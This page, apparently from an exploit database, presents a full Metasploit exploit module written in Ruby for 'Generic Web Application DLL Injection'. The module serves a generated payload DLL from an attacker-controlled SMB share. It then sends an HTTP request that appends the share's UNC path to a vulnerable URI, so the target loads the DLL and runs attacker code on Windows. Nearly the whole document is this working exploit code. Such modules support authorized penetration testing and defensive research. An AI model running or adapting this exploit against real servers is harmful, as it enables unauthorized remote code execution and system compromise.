Generic Web Application DLL Injection

Date: 04 Mar 2015 22:18:45
Reported by: Matthew Hall <[email protected]>
Type: metasploit
Source: www.rapid7.com

This module exploits conditions where an HTTP request triggers a DLL load from a specified SMB share. It serves payloads as DLLs over an SMB service and lets an arbitrary HTTP URL be called to trigger the load (CWE-427, uncontrolled search path element).

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::SMB::Server::Share
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Generic Web Application DLL Injection',
      'Description'    => %q{
        This is a general-purpose module for exploiting conditions where an HTTP request
        triggers a DLL load from a specified SMB share. This module serves payloads as
        DLLs over an SMB service and allows an arbitrary HTTP URL to be called that would
        trigger the load of the DLL.
      },
      'Author'         =>
        [
          'Matthew Hall <hallm[at]sec-1.com>'
        ],
      'Platform'       => 'win',
      'Privileged'     => false,
      'Arch'           => [ARCH_X86, ARCH_X64],
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'Payload'        =>
        {
          'Space'       => 2048,
          'DisableNops' => true
        },
      'References'     =>
        [
          ['CWE', '427']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Targets'        =>
        [
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
        ],
      'DefaultTarget'  => 0, # Default target is 32-bit as we usually inject into 32bit processes
      'DisclosureDate' => '2015-03-04'
      ))

    register_options(
      [
        OptString.new('FILE_NAME', [false, 'DLL File name to share (Default: random .dll)']),
        OptString.new('TARGETURI', [true,  'Path to vulnerable URI (The shared location will be added at the end)', '/cgi-bin/function.php?argument=' ]),
        OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 10])
      ])

    # FILE_CONTENTS is set programmatically in setup (the generated payload DLL)
    deregister_options('FILE_CONTENTS')
  end

  def setup
    super

    self.file_contents = generate_payload_dll
    self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll"
    print_status("File available on #{unc}...")
  end

  def primer
    # Build the trigger URL: the configured URI with the UNC path of the shared DLL appended
    sploit = target_uri.to_s
    sploit << unc

    print_status("Trying to trigger the DLL load via #{sploit}")
    send_request_raw({
      'method' => 'GET',
      'uri' => sploit
    }, 3)
  end

  def exploit
    begin
      Timeout.timeout(datastore['SMB_DELAY']) {super}
    rescue Timeout::Error
      # Timed out waiting for the SMB request: just finish the exploit and stop the SMB server
    end
  end
end
